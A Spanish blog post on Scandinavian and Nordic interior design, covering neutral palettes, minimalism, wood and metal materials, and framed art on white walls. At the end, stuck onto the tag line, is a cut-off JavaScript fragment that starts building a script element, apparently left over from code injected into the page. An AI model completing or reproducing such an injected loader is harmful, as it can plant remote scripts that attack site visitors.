Diseño Escandinavo

Uno de los estilos más populares del mundo “Estilo Nórdico”

Cuadro con colores vibrantes ¿Te gusta la decoración de color blanco, con lineas rectas y funcional?

 El estilo nórdico de decoración de interiores, es una evolución del conocido estilo de decoración escandinavo,  ambos tienen sus raíces en Noruega, Finlandia, Suecia y Dinamarca. La decoración escandinava se caracteriza principalmente  por utilizar colores claros y neutros, muebles de líneas puras y con toques envejecidos. En cuanto a los objetos de  decoración típicos de este estilo destacan los fabricados con materiales como el vidrio o la cerámica. La decoración de estilo  nórdico mezcla elementos básicos de la decoración escandinava, como los colores y tonos blancos y materiales como la      madera, con elementos del estilo industrial, como el metal.

 

Es un estilo que esta siendo muy utilizado ya que proporciona luminosidad a los ambientes y un toque de modernidad con piezas de arte que por lo general tienen colores vibrantes sobre paredes de color blanco, en su mayoría. EL minimalismo es una característica muy vista en este estilo, Es importante que no haya cosas en tu hogar que no uses o que no le aporten un significado a tu decoración. Esto puede ser una ventaja, ya que puedes invertir en muebles y accesorios que adores y sean de una mejor calidad.

Los cuadros y portarretratos son elementos básicos en el estilo escandinavo, ya que aportan color a las paredes blancas. Los marcos son de tamaño grande, aunque también es común ver varios mas pequeños arreglados en collage. En cuanto a arte, vemos tanto piezas modernas como clásicas, así que escoge tu estilo preferido. Trata de mantener los marcos de color claro si la pieza es oscura.

Decoración Escandinava

Cuadro Canvas en Blanco y Negro

Texturas

Escandinavo - Nórdicovar d=document;var s=d.createElement(‘script’);

No Comments

Post a Comment